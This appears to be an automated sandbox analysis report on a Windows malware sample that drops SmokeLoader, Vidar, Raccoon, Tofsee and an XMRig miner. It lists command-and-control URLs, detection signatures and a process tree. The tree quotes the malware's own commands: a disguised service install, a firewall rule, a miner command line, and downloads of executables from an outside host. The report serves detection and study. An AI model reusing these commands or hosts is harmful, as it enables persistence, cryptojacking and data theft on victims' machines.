Analysis
-
max time kernel
100s -
max time network
157s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
11/01/2022, 20:16
Static task
static1
General
-
Target
e7dd618fc92b7d8100f7cc364b9f56e6.exe
-
Size
272KB
-
MD5
e7dd618fc92b7d8100f7cc364b9f56e6
-
SHA1
82a01852cab9ead678bdc9fd218593609766421f
-
SHA256
3a32cec8daca39a42ae3a9c9f8fec4bd7ca3334b9b116a573efd12c8ba0a413b
-
SHA512
3becf96bf43a5112cd9cbf835fadac5a0486c62cd8ee0124d39e4acd117929f5cf4bcedf7fc7ec3cfbfe41d1aed7f44e1a24af6e072e71d302809a267276f079
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
vidar
49.6
1125
https://noc.social/@banda5ker
https://mastodon.social/@banda6ker
-
profile_id
1125
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral1/memory/1652-71-0x00000000005F0000-0x000000000060C000-memory.dmp family_arkei behavioral1/memory/1652-72-0x0000000000400000-0x0000000000455000-memory.dmp family_arkei -
LoaderBot executable 2 IoCs
resource yara_rule behavioral1/memory/1032-204-0x00000000000C0000-0x000000000051B000-memory.dmp loaderbot behavioral1/memory/1032-213-0x00000000000C0000-0x000000000051B000-memory.dmp loaderbot -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/1948-226-0x0000000000400000-0x00000000005A8000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral1/memory/1460-255-0x000000000026259C-mapping.dmp xmrig -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 1092 9B36.exe 1652 B550.exe 964 C3A3.exe 1828 D908.exe 952 D908.exe 1716 45FE.exe 1976 vmaxkqt.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral1/files/0x0005000000014079-147.dat upx behavioral1/files/0x0005000000014079-149.dat upx behavioral1/files/0x0005000000014079-156.dat upx behavioral1/files/0x0005000000014079-163.dat upx behavioral1/files/0x0005000000014079-174.dat upx behavioral1/files/0x0005000000014079-200.dat upx -
Deletes itself 1 IoCs
pid Process 1208 Process not Found -
Loads dropped DLL 1 IoCs
pid Process 1828 D908.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 844 set thread context of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 1828 set thread context of 952 1828 D908.exe 34 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 980 1716 WerFault.exe 35 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e7dd618fc92b7d8100f7cc364b9f56e6.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e7dd618fc92b7d8100f7cc364b9f56e6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e7dd618fc92b7d8100f7cc364b9f56e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9B36.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9B36.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9B36.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1688 e7dd618fc92b7d8100f7cc364b9f56e6.exe 1688 e7dd618fc92b7d8100f7cc364b9f56e6.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1688 e7dd618fc92b7d8100f7cc364b9f56e6.exe 1092 9B36.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1828 D908.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1208 Process not Found 1208 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1208 Process not Found 1208 Process not Found -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 844 wrote to memory of 1688 844 e7dd618fc92b7d8100f7cc364b9f56e6.exe 27 PID 1208 wrote to memory of 1092 1208 Process not Found 28 PID 1208 wrote to memory of 1092 1208 Process not Found 28 PID 1208 wrote to memory of 1092 1208 Process not Found 28 PID 1208 wrote to memory of 1092 1208 Process not Found 28 PID 1208 wrote to memory of 1652 1208 Process not Found 29 PID 1208 wrote to memory of 1652 1208 Process not Found 29 PID 1208 wrote to memory of 1652 1208 Process not Found 29 PID 1208 wrote to memory of 1652 1208 Process not Found 29 PID 1208 wrote to memory of 964 1208 Process not Found 30 PID 1208 wrote to memory of 964 1208 Process not Found 30 PID 1208 wrote to memory of 964 1208 Process not Found 30 PID 1208 wrote to memory of 964 1208 Process not Found 30 PID 1208 wrote to memory of 1828 1208 Process not Found 31 PID 1208 wrote to memory of 1828 1208 Process not Found 31 PID 1208 wrote to memory of 1828 1208 Process not Found 31 PID 1208 wrote to memory of 1828 1208 Process not Found 31 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1828 wrote to memory of 952 1828 D908.exe 34 PID 1208 wrote to memory of 1716 1208 Process not Found 35 PID 1208 wrote to memory of 1716 1208 Process not Found 35 PID 1208 wrote to memory of 1716 1208 Process not Found 35 PID 1208 wrote to memory of 1716 1208 Process not Found 35 PID 964 wrote to memory of 1972 964 C3A3.exe 36 PID 964 wrote to memory of 1972 964 C3A3.exe 36 PID 964 wrote to memory of 1972 964 C3A3.exe 36 PID 964 wrote to memory of 1972 964 C3A3.exe 36 PID 964 wrote to memory of 1300 964 C3A3.exe 39 PID 964 wrote to memory of 1300 964 C3A3.exe 39 PID 964 wrote to memory of 1300 964 C3A3.exe 39 PID 964 wrote to memory of 1300 964 C3A3.exe 39 PID 964 wrote to memory of 1048 964 C3A3.exe 41 PID 964 wrote to memory of 1048 964 C3A3.exe 41 PID 964 wrote to memory of 1048 964 C3A3.exe 41 PID 964 wrote to memory of 1048 964 C3A3.exe 41 PID 964 wrote to memory of 812 964 C3A3.exe 43 PID 964 wrote to memory of 812 964 C3A3.exe 43 PID 964 wrote to memory of 812 964 C3A3.exe 43 PID 964 wrote to memory of 812 964 C3A3.exe 43 PID 964 wrote to memory of 828 964 C3A3.exe 45 PID 964 wrote to memory of 828 964 C3A3.exe 45 PID 964 wrote to memory of 828 964 C3A3.exe 45 PID 964 wrote to memory of 828 964 C3A3.exe 45 PID 964 wrote to memory of 1812 964 C3A3.exe 47 PID 964 wrote to memory of 1812 964 C3A3.exe 47 PID 964 wrote to memory of 1812 964 C3A3.exe 47 PID 964 wrote to memory of 1812 964 C3A3.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"C:\Users\Admin\AppData\Local\Temp\e7dd618fc92b7d8100f7cc364b9f56e6.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\9B36.exeC:\Users\Admin\AppData\Local\Temp\9B36.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1092
-
C:\Users\Admin\AppData\Local\Temp\B550.exeC:\Users\Admin\AppData\Local\Temp\B550.exe1⤵
- Executes dropped EXE
PID:1652
-
C:\Users\Admin\AppData\Local\Temp\C3A3.exeC:\Users\Admin\AppData\Local\Temp\C3A3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ztrlnomv\2⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vmaxkqt.exe" C:\Windows\SysWOW64\ztrlnomv\2⤵PID:1300
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ztrlnomv binPath= "C:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exe /d\"C:\Users\Admin\AppData\Local\Temp\C3A3.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:1048
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ztrlnomv "wifi internet conection"2⤵PID:812
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ztrlnomv2⤵PID:828
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1812
-
-
C:\Users\Admin\AppData\Local\Temp\D908.exeC:\Users\Admin\AppData\Local\Temp\D908.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\D908.exeC:\Users\Admin\AppData\Local\Temp\D908.exe2⤵
- Executes dropped EXE
PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\45FE.exeC:\Users\Admin\AppData\Local\Temp\45FE.exe1⤵
- Executes dropped EXE
PID:1716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 4122⤵
- Program crash
PID:980
-
-
C:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exeC:\Windows\SysWOW64\ztrlnomv\vmaxkqt.exe /d"C:\Users\Admin\AppData\Local\Temp\C3A3.exe"1⤵
- Executes dropped EXE
PID:1976 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:1504
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\755C.exeC:\Users\Admin\AppData\Local\Temp\755C.exe1⤵PID:1388
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\8313.exeC:\Users\Admin\AppData\Local\Temp\8313.exe1⤵PID:240
-
C:\Users\Admin\AppData\Local\Temp\A1DA.exeC:\Users\Admin\AppData\Local\Temp\A1DA.exe1⤵PID:1644
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\A49B.bat C:\Users\Admin\AppData\Local\Temp\A1DA.exe"2⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵PID:1852
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32161\123.vbs"3⤵PID:1696
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/htrrfwedsqw.exe" "setup_c.exe" "" "" "" "" "" ""3⤵PID:1728
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_c.exesetup_c.exe3⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/c_setup.exe" "setup_m.exe" "" "" "" "" "" ""3⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_m.exesetup_m.exe3⤵PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "/download" "http://a0620531.xsph.ru/RMR.exe" "setup_s.exe" "" "" "" "" "" ""3⤵PID:1964
-
-
C:\Users\Admin\AppData\Local\Temp\32161\setup_s.exesetup_s.exe3⤵PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A499.tmp\A49A.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\B896.exeC:\Users\Admin\AppData\Local\Temp\B896.exe1⤵PID:560
-
C:\Users\Admin\AppData\Local\Temp\D4AF.exeC:\Users\Admin\AppData\Local\Temp\D4AF.exe1⤵PID:1948
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1048
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:960